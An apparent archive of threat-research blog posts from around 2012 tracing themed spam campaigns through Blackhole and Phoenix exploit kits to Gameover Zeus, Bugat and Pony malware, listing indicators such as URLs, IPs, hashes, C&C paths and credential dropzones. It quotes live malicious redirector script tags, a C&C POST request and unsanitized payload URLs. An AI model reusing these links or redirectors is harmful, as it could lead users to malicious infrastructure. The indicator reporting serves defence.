Category Archives: Uncategorized

Careerbuilder spam….again

Back in March, we wrote about a Careerbuilder spam that was used to drop a Gameover Zeus payload.  It turns out that today, we are seeing an identical spam message dropping not a Gameover Zeus payload, but Bugat.

The body of the spam messages are similar to the following:

Hello,

I am a customer service employee at CareerBuilder. I found a vacant position at Security Finance Corporation that you may be interested in based on information from your resume or a recent online submission you made on our site. You can review the position on the CareerBuilder site here:

Chief Business Development Officer

Best wishes in your job search !

Gretchen
Careerbuilder Customer Service Team
CareerBuilder ,5550-A Peachtree Parkway , Norcross, GA 30092

If you compare the text of this spam to the one we saw in March, you will see they are almost identical except for a few of the words such as the ‘company’ with the open position and the ‘Careerbuilder Customer Service’ team members name.

While the emails utilize several different hyperlink URLs to redirect the victims to an exploit kit, each of these various URLs seems to end in ‘car.html.’

The car.html pages redirect to a Black hole exploit kit at masterinsland[.]net/main.php?page=975982764ed58ec3.  This domain is hosted at IP address 70.32.97.205.  The kit drops the payload via masterisland[.]net/w.php?f=58e0f&e=0.  The Bugat payload has the following properties:

MD5: 518648694d3cb7000db916d930adeaaf
File Size:  62,464 bytes
Description: G Data AntiVirus

This variant utilizes the following C&C’s:

zorberzorberzu[.]ru/mev/in/
internetsexcuritee4dummies[.]ru/mev/in/
prakticalcex[.]ru/mev/in/
nalezivmordu[.]in/mev/in/

So, the question here is, is there any connection between the actor installing the March Gameover Zeus payload and the actor installing the current Bugat payload?  Or is this merely a shared/copied spam template?  Personally, Im betting there is far more overlap than a copied spam template.  We’d love to hear other opinions on this as well.

Advertisements

Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 2862ZO31)

On 2012-04-11 we observed a NACHA-themed spam email with the subject line “Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 2862ZO31)”. The spam sample we analyzed was sent from 186.46.122.162. This IP is a node in a Cutwail spambot.

This spam sample contained a malicious link to http://www.arydan.pl/page-15.htm. It appears the the www.arydan.pl is an otherwise legitimate site that was hacked. The spammers placed page-15.html in the webroot directory of this compromised site. We were able to locate other hacked that also contained a malicious page-15.htm. Other hacked sites included:

http://www.brochurepedia.nl/page-15.htm
http://www.mocvi.ge/page-15.htm
panda-roux.fr/page-15.htm

While there were likely many other hacked sites, the page-15.htm file appears to be a good indicator for this particular campaign. Unfortunately, this indicator is likely to be short lived and the spammers will almost certainly alter this pattern in future attacks.

The malicious page-15.htm files contained malicious javascript that redirected victims to a Phoenix Exploit kit at webmastaumuren.ru:8080/img/?promo=nacha. It is worth noting that this Phoenix Kit at webmastaumuren.ru imports content from the legitimate nacha.org website in an effort to construct a well designed phishing websites. We previously saw this same technique in an earlier NACHA-themed campaign on 2012-02-28.

This exploit kit in turn handed victims off to another exploit kit at dedovshinaus.su:8080/pages/dq.php?i=8. The kit at dedovshinaus.su drops the following Gameover Zeus variant on its victims:

Size: 301096
MD5: C23C96D34C2D408E20C24F07DFE8E078

Victims that clicked on the report-ACH285369733632711US.exe link in the NACHA phishing site also downloaded the same Gameover Zeus variant (i.e. the same Md5 hash). This payload was digitally signed with a certificate labeled ‘t9H2RXj1BlhxLEQ’.

This Gameover variant had a botid of mf222a11. The operators of this campaign controlled victims via a proxy server at 200.58.99.114 over port 443. This is the same proxy server used in the BillMeLater spam campaign seen earlier today.

Your Flightticket

On Monday April 9, 2012, we examined a spam email with the subject line “Your Flightticket”. This spam message contained the following text:

Dear Customer,

FLIGHT NUMBER 3702-5114295

DATE/TIME : APRIL 16, 2011, 17:16 PM
ARRIVING AIRPORT: NEW-YORK AIRPORT
PRICE : 3872.58 USD

Your bought ticket is attached to the letter as a scan document (Internet Exlporer File).

To use your ticket you should print it.

Nelda Sharpe,

The attached zip file had an MD5 of b9502c28044ad8335beca132c3c81b12. The zip file contained an html file. This html file contained malicious javascript that redirected victims to a Phoenix Exploit kit at 112.78.124.115:8080/navigator/jueoaritjuir.php. Victims were then redirected to a second Phoenix Exploit kit at engineofsovjets.su:8080/navigator/frf3.php?i=8.

The Phoenix kit at engineofsovjets.su dropped a Pony downloader with the following properties:

File: dsarcubqinhsjqkugsbm.exe
Size: 147496
MD5: E6F5310AC836E48C3B4181E1C00CE4CD

This Pony downloader was signed with a digital certificate labeled “4mb5gWTlIemu0h0”.

This Pony downloader was configured to send stolen FTP and other web admin credentials to dropzones at:

http://www.alberghi.com:8080/pony/gate.php
http://buyandsmile.atomclick.co:8080/pony/gate.php

This Pony downloader was also configured to download a Gameover Zeus payload from the following locations:

http://contabilidadesr.com.br/1mmF86V8/Vdqu.exe
http://www.vandenboschelektro.be/vgwCwvDs/Y9fNYJCs.exe
http://geovanabauerdocesfinos.com.br/6md3zev5/hQj.exe

This Gameover Zeus variant had the following properties:

Size: 305704
MD5: 01D994DF6DBDA4F49E8A6D9CB0005485

This Gameover variant had a botid of mf222a10. Oh yeah, it was also signed with the same digital cert – “4mb5gWTlIemu0h0”.

Where have we seen that digital cert before? Oh yeah, the Newegg.com-themed campaign from April 9, 2012 also signed its Pony and Zeus payloads with the same digital certificate.

This fact is significant because the Newegg campaign leveraged a Blackhole Exploit Kit infrastructure whereas the Flightticket-themed campaign leveraged a Pheonix Exploit kit-themed infrastructure. While these campaign leverage different exploit kit infrastructures it seems clear that they are related as they are dropping the same malware families and are signing payloads with the same digital certificates.

Newegg.com – Payment Charged

On 2012-04-09 we observed a Newegg.com-themed spam template. The spam message that we observed had a subject line of “Newegg.com – Payment Charged” and was sent from a Cutwail spambot.

The observed spam contained a malicious link to http://game.knightscricket.co.za/SpwNjjYt/index.html. There were likely other Newegg.com-themed spam messages associated with this campaign that contained different malicious links and had different subject lines.

The above malicious page, http://game.knightscricket.co.za/SpwNjjYt/index.html, contained the following javascript redirectors:

<script type=”text/javascript” src=”http://congress-assistants.fi/idm2TZP1/js.js”></script&gt;
<script type=”text/javascript” src=”http://primasaleorganik.com/3N6zKxSS/js.js”></script&gt;

These javascript redirectors bounced victims to an exploit kit at http://216.224.182.94/showthread.php?t=d7ad916d1c0396ff.

This exploit kit dropped a Pony downloader with the following properties:

Size: 147496
MD5: DFDA409D8BCC7CDDBBB39A40E388E8BA

This Pony downloader was signed with a digital certificate labeled “4mb5gWTlIemu0h0”.

This Pony downloader was configured to send stolen FTP and other wed admin credentials to dropzones at:

http://www.alberghi.com:8080/pony/gate.php
http://buyandsmile.atomclick.co:8080/pony/gate.php

Hrm, notice that the domain alberghi.com, home to a Pony drop in this campaign, was also home to a Blackhole Exploit kit in a previous American Express-themed spam campaign.

The above Pony downloader, DFDA409D8BCC7CDDBBB39A40E388E8BA, was also configured to download a Gameover Zeus payload from the following locations:

http://finskiydom.com.ua/JdS.exe
http://developerspk.com/DeYhzGj.exe
http://mestraimoveis.com.br/0Ev34x.exe
http://www.bmsevero.com.br/J1eGwcP.exe

This Zeus payload had the following properties:

Size: 305704
MD5: D76F25DF18F89830323CD6DECD657574

Interesting … this Zeus payload was signed with the same digital cert as the above Pony downloader. The Zeus payload’s digital cert had the same “4mb5gWTlIemu0h0” label.

This Zeus variant had a botid of “NRa10”.

Xerox, Your Flight, and Intuit

Just when we thought we had the attackers figured out, they went and switched things up on us.  Previously any of the spam campaigns that had an .htm attachment redirected to a Phoenix exploit kit which then installed Bugat/Feodo/Cridex.  Well, today, we noticed that these spam messages with .htm attachments are still redirecting to a Phoenix exploit kit but installing a Pony Loader binary which then installs Gameover Zeus.

3 separate spam themes were observed:

Your Intuit.com software order.

Fwd: Scan from a Xerox W. Pro #858678

Fwd: Your Flight F 458-37826

These .htm attachments contain scripts with are used to redirect to Phoenix exploit kits at the following URL’s:

sumanoidos[.]ru:8080/navigator/jueoaritjuir.php
selenasopka[.]ru:8080/navigator/jueoaritjuir.php
sonografx[.]ru:8080/navigator/jueoaritjuir.php

All of the above Phoenix domains are hosted via the same fast flux network at the following IP addresses:

78.83.233.242
78.107.82.98
89.218.55.51
118.97.9.60
125.19.103.198
41.66.137.155
41.168.5.140
61.187.191.16
62.85.27.129
219.94.194.138
180.235.150.72
194.85.97.121
200.169.13.84
202.149.85.37
210.56.23.100
210.56.24.226
210.109.108.210

The payload, Pony Loader, is installed via poosdfhhsppsdns[.]su:8080/navigator/frf3.php?i=6&f=c0af9&e=0:

file name:  dsarcubqinhsjqkugsbm.exe
file size: 95.272 bytes
md5:  90222ad40f07231a35c37fbbc4a6e91d
This file is digitally signed:

This Pony Loader posts to a C&C at 91.121.178[.]156/pony/gate.php.  It then attempts to download a Gameover Zeus binary from the following URL’s:

http://www.ciupanezu[.]ro/6rBQWWdx/9ZR.exe
hosbos.com[.]br/rvrsraDu/p7t.exe
http://www.omegaconstrucciones.com[.]ar/UK90biGf/QS6TvK2.exe

file size:  304,168 bytes
md5:  a2e0ac37b5cd193262ce7eb1ea72ba50
Ironically, this file has the exact same digital signature as the above Pony Loader:

The Gameover Zeus variant connects to a drop at 173.166.31.129:15471 and uses a bot ID of mf222a3.

So what does this new trend tell us?  Well, it looks like the actors using Bugat may switch to Gameover Zeus to supplement their infections.  We have yet to see any Bugat installs today.

Your Bill Is Now Available

We saw a return of Verizon Wireless-themed spam today. The sample in question had a subject line of “Your Bill Is Now Available” and was sent from a Cutwail spambot at 86.120.45.80.

This sample had the following malicious links:

casinhajoia.com.br/CvBvr8r9/index.html
coastcruises.com.au/nS9X51yA/index.html
ftp.chirvancontract.gr/K7qjpRQ7/index.html
enil1.home.pl/nS9X51yA/index.html
ftp.bobstudio.com.hk/LgBXz0BV/index.html

These malicious links contained the following html code:

<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”http://colecoesearte.com.br/Kypp5Enk/js.js”></script&gt;
<script type=”text/javascript” src=”http://rafaeltezelli.com.br/G1GCPjut/js.js”></script&gt;

These javascript redirectors in turn bounced victims to a Blackhole Exploit kit at wildestant.com/showthread.php?t=d7ad916d1c0396ff.

Vulnerable victims directed to the above URL at wildestant.com then downloaded a Pony downloader with the following properties:

File: about.exe
Size: 95785
MD5: 14D9C851566E0C66EF67E2C08E6866A7

This Pony downloader posted stolen FTP credentials to http://88.85.99.44:8080/pony/gate.php. The downloader was also configured to communicate with the following backup dropzones in the event the primary at 88.85.99.44 was unavailable. The backup drops were located at:

http://91.121.140.103:8080/pony/gate.php
http://91.121.178.156:8080/pony/gate.php

The Pony downloader was also configured to downloader a Gameover Zeus variant from the following locations:

http://gnarlybuys.info/LMbir.exe
http://karinasadvertising.com/vXFEiixu.exe
http://mancomunidadcentro.org.bo/wN7iM.exe
http://100s.pl/jQnoeUC.exe

This Gameover variant had the following properties:

Size: 262696
MD5: B818C5240F3D45A123F2A497ACA8BEA1

This Gameover variant sent stolen data to drops zones at:

188.230.92.97:15043
93.177.168.141:16115

Web injects were downloaded from 93.177.168.141:16115.

Note, we also observed other blackhole exploit kits at:

184.82.202.46
69.164.199.162

 

Careerbuilder spam delivers more than just a new job posting

Our Gameover Zeus friends are hoping that you are looking for a new job with the latest Careerbuilder spam campaign which claims to contain a link to a position that you would be interested in.

This campaign uses some of the following subject lines:

You might be interested in this vacant position.
Careerbuilder.com has found an open position for you
Careerbuilder.com open positions suggestion.
New position found for you at Careerbuilder.com.

The sample analyzed contained links to 3 different compromised websites:

starrculinary[.]com/tMp7j7qT/index.html
wsndesign[.]com/thwzcFQd/index.html
whiteoak.co[.]za/thwzcFQd/index.html

These websites redirected to JS files at the following locations:

hedef-ik[.]com/SXgUX3Zp/js.js
maxtroholidays[.]com/Hk89vZp3/js.js
runa.dp[.]ua/4cstVpNa/js.js
http://www.dimarcoagenziaassicurazioni[.]it/Tr39e5sz/js.js

In typical fashion, the Javascript is used to redirect to a Blackhole exploit kit. Todays kit continues on the ‘slick’ theme we saw yesterday – slickvenue[.]com/showthread.php?t=d44175c6da768b70.

This kit attempted to download the following exploits:

score.swf
Detected by 20/43 vendors on VirusTotal.

Qai.jar
Detected by 0/43 on VirusTotal.

field.swf
Detected by 17/43 on VirusTotal.

10a1e.pdf
Detected by 3/43 on VirusTotal.

It then installed the Gameover Zeus binary via slickvenue[.]com/q.php?f=e0c3a&e=0:

File Name: contacts.exe
MD5: 565f1a0802d1320ef3e28a98567fca95
Size: 284184 bytes
This file is detected by 9/43 on VirusTotal.

Gee, this file is signed with a very familiar looking digital signature (see yesterdays ‘Fraud Protection Alert’):


This Gameover Zeus variant is currently posting to a drop zone at 183.178.102[.]107:26672/index.php and uses a BotID of ‘ppcz20’.

Spammed Goo.gl Links – Part 2

One thing that we seem to have noticed (and granted we do have limited visibility of all spam campaigns) is that it seems when the spam campaign’s using Google’s link shortening service aren’t distributing malware, they are being used to redirect visitors to pharma websites.  We thought we’d look at where these were redirecting in a little more depth today.  So first we started to look at how the links were being delivered and were surprised to see that forum spam appeared to be a primary distribution method.  Here’s an example:

This spam contains 5 links so we thought we’d follow each of them and were again surprised to see the results:

The first link, goo.gl/syRGc, redirects to a rogue antivirus program called ‘Windows Trojans Sleuth’ via security-software-fgfdgf.info

The second link, goo.gl/x4IbG, redirects to a ‘Pharmacy online’ at bluepillss.comsyhost.com

The third link, goo.gl/J11W4, redirects to a ‘ViaGrow’ website at hifrino.ru

The fourth link, goo.gl/20yq0, redirects to a English/Spanish/French (?) language ‘Pills and Tabs’ website at bluepillstab.com

The fifth link, goo.gl/Ug1NW, redirects to mobile monitoring software at mspymobile.com

It looks like affiliate programs may be a good supplement to the income generated from Bugat/Gameover Zeus malware campaigns…as if that wasn’t enough.

Moar Intuit Spam

Ugh, another day … another Intuit-themed Spam run. Instead of including malicious links with the URL pattern /intu.html todays spam run linked to /int-market.html. The bad links redirected victims to a Blackhole Exploit kit at migdaliasbistro[.]net.

This exploit kit dropped a Bugat/Feodo payload with the MD5 e6e3f2dd452fad8d88E8156a4fa7ca2f.

This payload retrieved its configuration file/target list via a POST request to a command and control server at hbirjhcnsuiwgtrq[.]ru/rwx/B2_9w3/in/.

Note that the domain migdaliasbistro[.]net was hosted on a fast-flux network. This domain had A records with a TTL of 900 seconds and currently resolved to 41.64.21.71 as well as 213.179.193.132. A quick review of these IPs shows that they previously hosted Blackhole Exploit kits used in previous campaigns that weve covered in our posts “Triple Barrel Spam Cannon” and “Your Intuit Order“. Domains previously hosted on these IPs include:

  • perikanzas.com
  • 110hobart.com
  • energirans.net
  • hapturing.net
  • housespect.net
  • synergyledlighting.net

The command and control server domain at hbirjhcnsuiwgtrq[.]ru was also hosted on a fast-flux network. This domain’s A record had a TTL of 60 seconds and currently resolved to the following IPs:

83.170.91.152
87.120.41.155
94.20.30.91
98.103.133.13
46.137.85.218
62.183.104.36
173.203.211.157

The fast-flux network used to host the command and control domain at hbirjhcnsuiwgtrq[.]ru appears to be a separate and distinct from the network hosting the exploit kit at migdaliasbistro[.]net. Note that the IPs hosting the hbirjhcnsuiwgtrq[.]ru domain overlap with the IPs mentioned in “The Redret Connection“.

Your Intuit Order

Over the last two days we observed two different spam campaigns spoofing communications from Intuit.  

The first campaign, observed yesterday 2012-02-29, contained a malicious link to sumero2[.]sicakcikolata[.]com/intu.html. Additional spam samples included similar links to URLs ending in /intu.html. This page redirected victims to a Blackhole Exploit kit at perikanzas[.]com. This kit dropped a Bugat/Feodo payload with the MD5 7cb6acde5f89832fd4f2e69b20c26d4d. This Bugat/Feodo variant retrieved a configuration file/target list via the following POST request to a command and control server at wiwwkvjkinewgycb.ru:

POST /rwx/B2_9w3/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: wiwwkvjkinewgycb.ru:8080
Content-Length: 97
Connection: Keep-Alive
Cache-Control: no-cache

Another spam campaign seen today sent almost the same spam template spoofing communications from Intuit. The text was identical but the formatting was slightly different.

A sample from today’s campaign contained a malicious link to premiumsoft[.]com[.]ar/fe28oiHd/index.html. By now, we should all recognize the pattern in the URL and know that this malicious link will contain javascript redirectors that send victims to a Blackhole Exploit Kit that drops Gameover Zeus. In this specific case premiumsoft[.]com[.]ar/fe28oiHd/index.html contained the following javascript redirectors:

hxxp://kocaelibakimrehabilitasyon[.]gov[.]tr/TXvNpbbR/js.js
hxxp://nestahotel[.]com/jNN7XEMM/js.js
hxxp://trendhome[.]org/bHrL1Bpk/js.js
hxxp://www[.]tncas[.]com/KzXgGvRV/js.js
hxxp://www[.]umutpirinci[.]com/sxrwX5TS/js.js

These malicious scripts redirected victims to a Blackhole Kit at trucktumble[.]com. This kit dropped a Gameover Zeus with the following properties:

Size: 285184
MD5: 2D24DF1A327094AA18DB9DE7554C4E8C

This Zeus variant had a bot id of ‘mmz1’ and sent stolen banking credentials to a drop zone at 88.216.22.31 over port 27724.

It cant be a coincidence that almost the same spam template was used in two different spam campaigns that dropped two different malware payloads, can it?